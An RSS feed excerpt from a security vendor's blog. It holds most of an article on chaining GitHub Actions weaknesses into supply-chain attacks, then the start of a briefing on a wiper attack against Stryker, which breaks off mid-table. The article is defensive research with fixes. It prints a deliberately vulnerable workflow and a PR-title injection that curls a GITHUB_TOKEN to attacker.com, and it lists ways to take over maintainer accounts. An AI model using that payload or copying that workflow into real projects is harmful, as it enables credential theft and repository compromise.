&lt;p&gt;Our scan did exactly this: 50,012 repos scanned with Runner Guard, 20,265 vulnerable repos identified, 192,776 findings catalogued - all from public data, in days, with minimal infrastructure. An attacker performing the same reconnaissance would build a prioritized target list ranked by downstream impact: which actions have the most consumers, which repos have the most forks, which pipelines have the most sensitive access.&lt;/p&gt; 
&lt;p&gt;The &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;supply chain data from our scan&lt;/a&gt; is essentially the output of this recon phase. docker/login-action@v3 in 1,848 repos. softprops/action-gh-release in 1,405. dtolnay/rust-toolchain in 989. Every one of those numbers is a blast radius.&lt;/p&gt; 
&lt;h2&gt;Step 2: Compromise the Action&lt;/h2&gt; 
&lt;p&gt;The attacker’s target isn’t the downstream repos - it’s the action maintainer’s GitHub account.&lt;/p&gt; 
&lt;p&gt;Methods: credential stuffing from previous data breaches. Phishing campaigns personalized from the maintainer’s public GitHub activity. Expired email domain takeover - if the maintainer’s recovery email domain has lapsed, buy it and reset their password. Social engineering through GitHub issues or pull requests.&lt;/p&gt; 
&lt;p&gt;Only ONE account needs to be compromised. Not the downstream repos, not GitHub itself - one maintainer.&lt;/p&gt; 
&lt;p&gt;This is what happened with tj-actions/changed-files in March 2025. The maintainer’s account was compromised through credential exposure. The attacker gained push access to the repository. No software vulnerability was exploited. No zero-day. Just a person’s credentials.&lt;/p&gt; 
&lt;p&gt;The &lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;single-maintainer problem&lt;/a&gt; our data reveals makes this step disturbingly efficient. &lt;code&gt;action-gh-release&lt;/code&gt; - maintained by a single account - is used by 1,405 repos. &lt;code&gt;rust-toolchain&lt;/code&gt; - maintained by a single account - controls the CI infrastructure for most of the Rust ecosystem across 989 repos. &lt;code&gt;create-pull-request&lt;/code&gt; - maintained by a single account - has 59 action references across 353 repos. Compromise any one of these accounts and step 2 is complete.&lt;/p&gt; 
&lt;h2&gt;Step 3: Payload Injection&lt;/h2&gt; 
&lt;p&gt;With push access to the action’s repository, the attacker modifies the action’s code and moves the mutable tag (e.g., &lt;code&gt;@v3&lt;/code&gt;) to point at the malicious commit.&lt;/p&gt; 
&lt;p&gt;The key insight: the action’s repository looks normal. Same tag name. Same version number. The tag just points somewhere different now. There’s no pull request, no code review, no approval process. Git tags are mutable - they can be deleted and recreated to point at any commit.&lt;/p&gt; 
&lt;p&gt;The payload itself targets CI environment variables. GitHub Actions workflows run with access to: - &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; - write access to the repository (if permissions allow) - Cloud credentials - AWS keys, GCP service account tokens, Azure connection strings - Registry tokens - NPM, PyPI, Docker Hub, Homebrew - Signing keys - code signing, release attestation&lt;/p&gt; 
&lt;p&gt;The payload doesn’t need to be sophisticated. A few lines of shell that base64-encode environment variables and POST them to an attacker-controlled endpoint. The exfiltration happens inside the CI runner, which has network access by default. No firewall to bypass. No endpoint detection to evade. The runner is a clean environment that trusts everything running inside it.&lt;/p&gt; 
&lt;h2&gt;Step 4: Zero-Click Propagation&lt;/h2&gt; 
&lt;p&gt;This is where CI/CD chain attacks diverge from every other attack class: propagation is automatic.&lt;/p&gt; 
&lt;p&gt;Every repository using &lt;code&gt;action@v3&lt;/code&gt; resolves that reference at runtime. The next time any of those repositories’ CI pipelines trigger - a push, a pull request, a scheduled workflow, a manual dispatch - the compromised code executes. No interaction required from the downstream repo maintainers. No approval. No awareness.&lt;/p&gt; 
&lt;p&gt;From our data: docker/login-action@v3 alone would hit 1,848 of GitHub’s top repos on the next CI trigger. That’s not 1,848 alerts - it’s 1,848 pipelines executing the attacker’s code with whatever credentials those pipelines hold. Docker registry tokens, cloud provider secrets, GITHUB_TOKENs with write access.&lt;/p&gt; 
&lt;p&gt;The propagation is horizontal. One compromised action doesn’t target one repo - it targets every consumer simultaneously. The blast radius isn’t one organization - it’s the subset of the open-source ecosystem that depends on that action.&lt;/p&gt; 
&lt;p&gt;And the timing is unpredictable from the attacker’s perspective - some repos trigger CI on every push, some on a schedule, some only on pull requests. The compromise rolls out gradually as different repos trigger their pipelines, creating a time window where the attack is active but not yet widely noticed.&lt;/p&gt; 
&lt;h2&gt;Step 5: Lateral Movement&lt;/h2&gt; 
&lt;p&gt;Stolen credentials open doors beyond the CI pipeline.&lt;/p&gt; 
&lt;p&gt;A compromised &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; with write permissions - and our data shows 7,236 repos grant write access via RGS-008 - can push code directly to the downstream repository. The attacker is now inside the project’s source code, not just its CI. They can modify release workflows, add themselves as a contributor, or inject backdoors into the codebase itself.&lt;/p&gt; 
&lt;p&gt;Stolen cloud credentials (AWS, GCP, Azure) access production infrastructure. The jump from CI pipeline to production environment is a single API call with the right credentials.&lt;/p&gt; 
&lt;p&gt;Stolen registry tokens (NPM, PyPI, Docker Hub) allow publishing backdoored packages. The attacker is now in the downstream project’s software supply chain - not just their CI/CD supply chain.&lt;/p&gt; 
&lt;p&gt;Each stolen credential is a pivot point. The attack chain doesn’t end at exfiltration - it’s the beginning of a second, third, or fourth chain.&lt;/p&gt; 
&lt;h2&gt;Why This Chain Is Different&lt;/h2&gt; 
&lt;p&gt;Traditional security tools don’t see it.&lt;/p&gt; 
&lt;ul&gt; 
 &lt;li&gt;&lt;strong&gt;No CVE is exploited.&lt;/strong&gt; There’s no software vulnerability to patch. The attack exploits a trust model, not a code defect.&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;No code changes in the victim repo.&lt;/strong&gt; The workflow file stays identical. The action reference still says &lt;code&gt;@v3&lt;/code&gt;. The code that &lt;code&gt;@v3&lt;/code&gt; points to changed - upstream, in someone else’s repository.&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;No review process triggers.&lt;/strong&gt; Moving a Git tag doesn’t create a pull request, doesn’t send a notification, doesn’t appear in the downstream repo’s activity log.&lt;/li&gt; 
 &lt;li&gt;&lt;strong&gt;SAST, DAST, and SCA don’t scan CI/CD.&lt;/strong&gt; Traditional application security tools analyze application code and dependencies. They don’t examine workflow files, action references, or CI permission configurations.&lt;/li&gt; 
&lt;/ul&gt; 
&lt;p&gt;This is why Vigilant built Runner Guard. The gap between traditional application security and CI/CD pipeline security is where these chain attacks operate.&lt;/p&gt; 
&lt;h2&gt;The Compound Evidence&lt;/h2&gt; 
&lt;p&gt;Our scan data maps directly to each step of the chain:&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Chain Step&lt;/th&gt; 
   &lt;th&gt;Our Evidence&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Recon&lt;/td&gt; 
   &lt;td&gt;143,616 unpinned action findings mapped across 20,265 repos&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Compromise&lt;/td&gt; 
   &lt;td&gt;Single-maintainer actions: action-gh-release (1,405 repos), rust-toolchain (989)&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Payload&lt;/td&gt; 
   &lt;td&gt;6,790 critical findings - CI environments with sensitive access&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Propagation&lt;/td&gt; 
   &lt;td&gt;docker/login-action@v3 reaches 1,848 top repos; 590M downstream forks&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Lateral&lt;/td&gt; 
   &lt;td&gt;RGS-008: 11,658 findings - write-access GITHUB_TOKEN in 7,236 repos&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;The most dangerous compound patterns in the dataset:&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Rule Combination&lt;/th&gt; 
   &lt;th&gt;Repos&lt;/th&gt; 
   &lt;th&gt;Risk&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;RGS-007 + RGS-008&lt;/td&gt; 
   &lt;td&gt;3,172&lt;/td&gt; 
   &lt;td&gt;Unpinned action + write perms = steal AND push&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;RGS-007 + RGS-008 + RGS-004&lt;/td&gt; 
   &lt;td&gt;611&lt;/td&gt; 
   &lt;td&gt;Triple compound - the complete chain in one repo&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;RGS-001 + RGS-002&lt;/td&gt; 
   &lt;td&gt;98&lt;/td&gt; 
   &lt;td&gt;Injection + dangerous trigger - direct code execution&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;The 611 triple-compound repos are the most dangerous in the dataset. They have all three elements: an unpinned action (the entry point), write permissions (the escalation path), and a dangerous trigger (the activation mechanism). An attacker doesn’t need to chain across multiple repos - everything is in one place.&lt;/p&gt; 
&lt;h2&gt;A Concrete Scenario - The PR Title Attack&lt;/h2&gt; 
&lt;p&gt;Abstract chain models are useful for understanding. Concrete examples are useful for convincing your team to fix this today. Here’s a real attack scenario built entirely from patterns we found in the dataset.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;The target:&lt;/strong&gt; A popular open-source framework (50K+ stars) with this workflow in &lt;code&gt;.github/workflows/greet.yml&lt;/code&gt;:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-yaml"&gt;on:
  pull_request_target:
    types: [opened]

jobs:
  greet:
    runs-on: ubuntu-latest
    permissions:
      contents: write
      pull-requests: write
    steps:
      - uses: actions/checkout@v4
        with:
          ref: $
      - run: |
          echo "Thanks for the PR: $"
          # ... process the PR
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;&lt;strong&gt;The attack - four lines, no tools, no exploits:&lt;/strong&gt;&lt;/p&gt; 
&lt;p&gt;An attacker opens a pull request with this title:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code&gt;"; curl -s https://attacker.com/exfil?token=$(echo $GITHUB_TOKEN | base64) #
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;When the workflow triggers, GitHub interpolates the PR title directly into the shell command. The &lt;code&gt;echo&lt;/code&gt; statement becomes:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-bash"&gt;echo "Thanks for the PR: "; curl -s https://attacker.com/exfil?token=$(echo $GITHUB_TOKEN | base64) #"
&lt;/code&gt;&lt;/pre&gt; 
&lt;p&gt;The shell executes &lt;code&gt;curl&lt;/code&gt;, which sends the repository’s &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; - with &lt;code&gt;contents: write&lt;/code&gt; and &lt;code&gt;pull-requests: write&lt;/code&gt; permissions - to the attacker’s server. The &lt;code&gt;#&lt;/code&gt; at the end comments out the trailing quote. Total execution time: under one second.&lt;/p&gt; 
&lt;p&gt;&lt;strong&gt;What the attacker now has:&lt;/strong&gt;&lt;/p&gt; 
&lt;ul&gt; 
 &lt;li&gt;Write access to the repository’s code (push commits, modify files, create branches)&lt;/li&gt; 
 &lt;li&gt;Write access to pull requests (approve PRs, merge code, post comments as the repo)&lt;/li&gt; 
 &lt;li&gt;The ability to push a backdoored commit to the main branch, affecting every downstream user&lt;/li&gt; 
&lt;/ul&gt; 
&lt;p&gt;&lt;strong&gt;What made this possible - four compounding weaknesses:&lt;/strong&gt;&lt;/p&gt; 
&lt;ol&gt; 
 &lt;li&gt;&lt;code&gt;pull_request_target&lt;/code&gt; trigger → runs with secrets access (RGS-005)&lt;/li&gt; 
 &lt;li&gt;Checkout of PR head → executes untrusted fork code (RGS-009)&lt;/li&gt; 
 &lt;li&gt;Expression injection → PR title flows to shell execution (RGS-001)&lt;/li&gt; 
 &lt;li&gt;&lt;code&gt;permissions: contents: write&lt;/code&gt; → stolen token can push code (RGS-008)&lt;/li&gt; 
&lt;/ol&gt; 
&lt;p&gt;No single finding is catastrophic. Together, they’re a complete compromise - from anonymous attacker to code-level write access in a top open-source project, triggered by opening a PR. This compound pattern exists in hundreds of repos in our dataset.&lt;/p&gt; 
&lt;p&gt;The fix is equally straightforward: move the PR title into an environment variable (&lt;code&gt;env: PR_TITLE: $&lt;/code&gt;), switch to &lt;code&gt;pull_request&lt;/code&gt; trigger, scope permissions to read-only. Minutes of work. The &lt;a href="https://www.vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege"&gt;Fix It guide&lt;/a&gt; covers each fix with before-and-after examples.&lt;/p&gt; 
&lt;h2&gt;The Active Exploit Chains&lt;/h2&gt; 
&lt;p&gt;541 repos have taint-to-execution chains - untrusted input from PR titles, issue bodies, or branch names flowing directly to shell execution:&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Category&lt;/th&gt; 
   &lt;th&gt;Star Range&lt;/th&gt; 
   &lt;th&gt;Rules Hit&lt;/th&gt; 
   &lt;th&gt;Findings&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Popular AI desktop client&lt;/td&gt; 
   &lt;td&gt;40K-45K&lt;/td&gt; 
   &lt;td&gt;10 rules&lt;/td&gt; 
   &lt;td&gt;124&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Popular low-code platform&lt;/td&gt; 
   &lt;td&gt;35K-40K&lt;/td&gt; 
   &lt;td&gt;9 rules&lt;/td&gt; 
   &lt;td&gt;1,030&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Java design patterns repo&lt;/td&gt; 
   &lt;td&gt;90K-95K&lt;/td&gt; 
   &lt;td&gt;6 rules&lt;/td&gt; 
   &lt;td&gt;18&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Popular BaaS platform&lt;/td&gt; 
   &lt;td&gt;55K-60K&lt;/td&gt; 
   &lt;td&gt;7 rules&lt;/td&gt; 
   &lt;td&gt;107&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;A popular AI desktop client triggers 10 different rule categories - the most diverse vulnerability profile in the dataset. A popular low-code platform has 1,030 findings across 9 rules - essentially every vulnerability type we detect.&lt;/p&gt; 
&lt;p&gt;These repos don’t just have compound vulnerabilities - they have active exploit chains where untrusted data flows from attacker-controlled sources (PR titles, issue bodies) through expression interpolation directly to shell execution with secrets access. An attacker submitting a specially crafted PR title could execute arbitrary commands in the CI runner.&lt;/p&gt; 
&lt;h2&gt;Unsafe Checkout - The Direct Path&lt;/h2&gt; 
&lt;p&gt;RGS-009 detects the most direct attack chain: repos using &lt;code&gt;pull_request_target&lt;/code&gt; that check out and execute fork code. The &lt;code&gt;pull_request_target&lt;/code&gt; trigger runs with full write access and secrets - unlike &lt;code&gt;pull_request&lt;/code&gt;, which runs in a sandboxed context. When a workflow checks out the PR head (the fork’s code) under this trigger, the attacker’s code runs with the same privileges as a trusted contributor.&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th&gt;Category&lt;/th&gt; 
   &lt;th&gt;Star Range&lt;/th&gt; 
   &lt;th&gt;Critical Findings&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Popular low-code platform&lt;/td&gt; 
   &lt;td&gt;35K-40K&lt;/td&gt; 
   &lt;td&gt;66&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Popular AI chat interface&lt;/td&gt; 
   &lt;td&gt;85K-90K&lt;/td&gt; 
   &lt;td&gt;3&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Popular multi-agent AI framework&lt;/td&gt; 
   &lt;td&gt;60K-65K&lt;/td&gt; 
   &lt;td&gt;6&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Kubernetes networking project&lt;/td&gt; 
   &lt;td&gt;20K-25K&lt;/td&gt; 
   &lt;td&gt;24&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;Major tech company’s language tool&lt;/td&gt; 
   &lt;td&gt;30K-35K&lt;/td&gt; 
   &lt;td&gt;24&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;p&gt;The AI repos are particularly concerning. Several popular AI tooling repositories - an AI chat interface, a multi-agent framework, an AI desktop client - all have RGS-009 misconfigurations that create OIDC credential theft vectors. An attacker submitting a PR to these repos could steal cloud credentials through the CI pipeline.&lt;/p&gt; 
&lt;h2&gt;The Code Injection + Self-Hosted Runner Chain&lt;/h2&gt; 
&lt;p&gt;The most dangerous combination in the dataset pairs code injection vulnerabilities (RGS-001, RGS-002) with self-hosted runner exposure. Self-hosted runners are persistent machines - unlike GitHub’s ephemeral runners, they don’t get destroyed after each job. An attacker who achieves code execution on a self-hosted runner can install persistent access: backdoors, credential harvesters, reverse shells that survive the workflow run.&lt;/p&gt; 
&lt;p&gt;Repos with this combination include a popular penetration testing framework (30K-40K stars), a popular developer portal (30K-35K stars), a popular API gateway (40K-45K stars), and a major Kubernetes networking project (20K-25K stars). These are high-value infrastructure targets where persistent access to the build environment has outsized impact.&lt;/p&gt; 
&lt;p&gt;The irony of the penetration testing framework bears repeating: the tool security professionals use to test for remote code execution has RCE vulnerabilities in its own CI/CD pipeline. The tool designed to find the problem is the problem.&lt;/p&gt; 
&lt;h2&gt;The Trust Paradox in Chain Attacks&lt;/h2&gt; 
&lt;p&gt;The organizations developers trust most aren’t immune to compound vulnerabilities - they’re often the most exposed. Our data shows major cloud platforms, OSS foundations, and framework organizations among the repos with the densest compound findings. A major Java framework organization has a 92.9% vulnerability rate across its repos - nearly every one with multiple overlapping rule hits.&lt;/p&gt; 
&lt;p&gt;This isn’t surprising when you understand the chain model. Larger organizations run more complex CI/CD with more action dependencies, more permission grants, more workflow triggers, and more credential access. Each additional element is another link that can be exploited. The chain doesn’t care about the brand name - it cares about the structure of the pipeline.&lt;/p&gt; 
&lt;h2&gt;What You Can Do About It&lt;/h2&gt; 
&lt;ol&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Break the chain at Step 1.&lt;/strong&gt; SHA-pin every action. If the reference is immutable, tag manipulation has no effect. The chain dies at the first link.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Minimize lateral movement at Step 5.&lt;/strong&gt; Scope &lt;code&gt;GITHUB_TOKEN&lt;/code&gt; permissions to the minimum required per job - &lt;code&gt;contents: read&lt;/code&gt;, not &lt;code&gt;write-all&lt;/code&gt;. An action that can’t push code limits the blast radius even if compromised.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Eliminate dangerous triggers.&lt;/strong&gt; &lt;code&gt;pull_request_target&lt;/code&gt; with checkout of fork code gives untrusted PRs access to secrets. Switch to &lt;code&gt;pull_request&lt;/code&gt; (which doesn’t have secrets access) or add explicit authorization checks.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Watch for compound patterns.&lt;/strong&gt; A single unpinned action is medium risk. An unpinned action plus write permissions plus a dangerous trigger is a complete attack chain. Scanner output that only shows individual findings misses the compounding - look for the combinations.&lt;/p&gt; &lt;/li&gt; 
 &lt;li&gt; &lt;p&gt;&lt;strong&gt;Assume the chain will be automated.&lt;/strong&gt; The &lt;a href="https://www.vigilantdefense.com/research/ai-agents-cicd-supply-chain-force-multipliers"&gt;AI agent analysis&lt;/a&gt; shows how every step of this chain can be orchestrated by autonomous agents. The speed and scale of the next major CI/CD supply chain attack will be fundamentally different from tj-actions.&lt;/p&gt; &lt;/li&gt; 
&lt;/ol&gt; 
&lt;p&gt;The chain attack is the threat model that makes CI/CD security different from application security. It’s not about one vulnerability in one repo - it’s about how weaknesses compound across the trust boundaries of the entire ecosystem. Understanding the chain is the first step to breaking it. The &lt;a href="https://www.vigilantdefense.com/research/fix-cicd-security-sha-pinning-least-privilege"&gt;Fix It guide&lt;/a&gt; walks through the specific fixes for each link.&lt;/p&gt;  
&lt;div class="v-related"&gt; 
 &lt;h2&gt;Related Articles&lt;/h2&gt; 
 &lt;ul&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/supply-chain-crisis-unpinned-github-actions"&gt;The Software Supply Chain Crisis - 74.5% of Findings Are Unpinned Actions&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/ai-agents-cicd-supply-chain-force-multipliers"&gt;AI Agents as Force Multipliers - The Next Evolution of Supply Chain Attacks&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/fixing-50k-repos-automated-pull-requests"&gt;What’s Next - Fixing 50K Repos, One PR at a Time&lt;/a&gt;&lt;/li&gt; 
  &lt;li&gt;&lt;a href="https://www.vigilantdefense.com/research/cicd-security-continuous-monitoring-beyond-snapshots"&gt;Beyond Snapshots - Why CI/CD Security Needs Continuous Monitoring&lt;/a&gt;&lt;/li&gt; 
 &lt;/ul&gt; 
&lt;/div&gt;  
&lt;p&gt;&lt;strong&gt;Scan your repos today.&lt;/strong&gt; &lt;a href="https://www.vigilantdefense.com/resources/runner-guard"&gt;Runner Guard&lt;/a&gt; is Vigilant’s free, open-source CI/CD security scanner - the same tool that powered this research. Install it in under a minute:&lt;/p&gt; 
&lt;pre class="highlight"&gt;&lt;code class="language-bash"&gt;brew install Vigilant-LLC/tap/runner-guard
runner-guard scan github.com/owner/repo
&lt;/code&gt;&lt;/pre&gt; 
&lt;div class="v-cta-buttons"&gt;
 &lt;a href="https://github.com/Vigilant-LLC/runner-guard" class="v-btn v-btn-primary"&gt;Install Runner Guard&lt;/a&gt;
 &lt;a href="https://www.vigilantdefense.com" class="v-btn v-btn-secondary"&gt;Learn More About Vigilant&lt;/a&gt;
&lt;/div&gt; 
&lt;p&gt;14 security rules. Zero configuration. One command.&lt;/p&gt;   
&lt;img src="https://track.hubspot.com/__ptq.gif?a=45116655&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fvigilantdefense.com%2Fresearch%2Fcicd-chain-attack-anatomy-recon-to-exfiltration&amp;amp;bu=https%253A%252F%252Fvigilantdefense.com%252Fresearch&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>Supply-Chain</category>
      <category>CICD</category>
      <pubDate>Tue, 24 Mar 2026 17:41:07 GMT</pubDate>
      <author>sales@vigilantnow.com (Chris Nyhuis)</author>
      <guid>https://vigilantdefense.com/research/cicd-chain-attack-anatomy-recon-to-exfiltration</guid>
      <dc:date>2026-03-24T17:41:07Z</dc:date>
    </item>
    <item>
      <title>INTEL BRIEFING SITREP - STRYKER ATTACK</title>
      <link>https://vigilantdefense.com/research/intel-briefing-sitrep-stryker-attack</link>
      <description>&lt;div class="hs-featured-image-wrapper"&gt; 
 &lt;a href="https://vigilantdefense.com/research/intel-briefing-sitrep-stryker-attack" title="" class="hs-featured-image-link"&gt; &lt;img src="https://vigilantdefense.com/hubfs/StrykerFeatureImage.png" alt="INTEL BRIEFING SITREP - STRYKER ATTACK" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"&gt; &lt;/a&gt; 
&lt;/div&gt; 
&lt;h2&gt;Executive Summary&lt;/h2&gt;</description>
      <content:encoded>&lt;h2&gt;Executive Summary&lt;/h2&gt;  
&lt;p&gt;On the night of March 11, 2026, an Iranian state-linked hacker group known as &lt;strong&gt;Handala&lt;/strong&gt; executed the most destructive cyberattack against a US corporation since the start of the US-Israel war on Iran. The target was &lt;strong&gt;Stryker Corporation&lt;/strong&gt;, a $131B medical device manufacturer with 56,000 employees across 61 countries. The attack wiped 200,000 devices, exfiltrated 50 terabytes of data, and shut down operations in 79 countries overnight. This was not an isolated event. It is the opening operation of a declared, escalating cyber warfare campaign against American and Western organizations.&lt;/p&gt; 
&lt;h2&gt;Attack Timeline&lt;/h2&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
   &lt;th style="width: 38%;"&gt;Time (EDT)&lt;/th&gt; 
   &lt;th&gt;Event&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;12:30–3:30 AM, Mar 11&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;Attack initiates. Devices begin wiping across global network.&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;3:30 AM&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;Employees in US, Ireland, Australia, India locked out. Personal phones wiped.&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Morning, Mar 11&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;Stryker HQ in Portage, MI physically closes. Phone system replaced with “building emergency” message.&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Mar 11 daytime&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;Stryker confirms “global network disruption to Microsoft environment” to CNN, WSJ, Bloomberg.&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Mar 11 evening&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;Stryker files with SEC. Full restoration timeline unknown.&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Mar 12&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;Systems remain offline. FBI and CISA have not publicly commented.&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;h2&gt;Attack Vector: How They Did It&lt;/h2&gt; 
&lt;p&gt;Handala compromised Stryker’s &lt;strong&gt;Microsoft Intune&lt;/strong&gt; environment — a cloud-based Mobile Device Management platform. By gaining administrative access, they:&lt;/p&gt; 
&lt;div class="v-callout"&gt; 
 &lt;p&gt;1. Pushed a mass wipe command to all enrolled devices — corporate and personal&lt;/p&gt; 
&lt;/div&gt; 
&lt;div class="v-callout"&gt; 
 &lt;p&gt;2. Defaced all login pages with the Handala logo&lt;/p&gt; 
&lt;/div&gt; 
&lt;div class="v-callout"&gt; 
 &lt;p&gt;3. Exfiltrated 50TB of data prior to destruction&lt;/p&gt; 
&lt;/div&gt; 
&lt;div class="v-callout"&gt; 
 &lt;p&gt;4. Sent emails directly to Stryker executives claiming ownership of the attack&lt;/p&gt; 
&lt;/div&gt; 
&lt;p&gt;Any organization using cloud-based MDM — whether Intune, Jamf, or Workspace ONE — has this same attack surface. An attacker with admin credentials can turn your device management platform into a remote kill switch. This is not a theoretical risk anymore.&lt;/p&gt; 
&lt;h2&gt;Patient Safety Impact: The Lifenet Situation&lt;/h2&gt; 
&lt;p&gt;Stryker’s subsidiary Physio-Control operates &lt;strong&gt;Lifenet&lt;/strong&gt;, the system US paramedics use to transmit EKG data from ambulances to hospital emergency departments before a patient arrives.&lt;/p&gt; 
&lt;div class="v-callout"&gt; 
 &lt;p&gt;&lt;strong&gt;Maryland’s Institute for Emergency Medical Services issued an alert to all hospitals in the state on March 11. Lifenet was non-functional in most parts of the state. EMS clinicians were instructed to revert to radio communication.&lt;/strong&gt;&lt;/p&gt; 
&lt;/div&gt; 
&lt;p&gt;When a cyberattack disrupts pre-hospital cardiac care, it has crossed from operational disruption into potential patient harm. Every healthcare-adjacent organization should be taking note.&lt;/p&gt; 
&lt;h2&gt;Why Stryker Was Targeted&lt;/h2&gt; 
&lt;table&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Israeli acquisition:&lt;/strong&gt; Stryker acquired OrthoSpace in Israel in 2019, still an active subsidiary per current SEC filings.&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;US DoD contract:&lt;/strong&gt; Stryker secured a $450 million contract to supply medical devices to the Department of Defense in 2025.&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;VA contracts:&lt;/strong&gt; Additional contracts with the Department of Veterans Affairs.&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Critical infrastructure role:&lt;/strong&gt; Physio-Control and Lifenet are embedded in US emergency response systems nationwide.&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;h2&gt;The Broader 48-Hour Campaign&lt;/h2&gt; 
&lt;p&gt;Stryker was one strike in a coordinated multi-front offensive. Here is what else happened in the same 48-hour window:&lt;/p&gt; 
&lt;table&gt; 
 &lt;thead&gt; 
  &lt;tr&gt; 
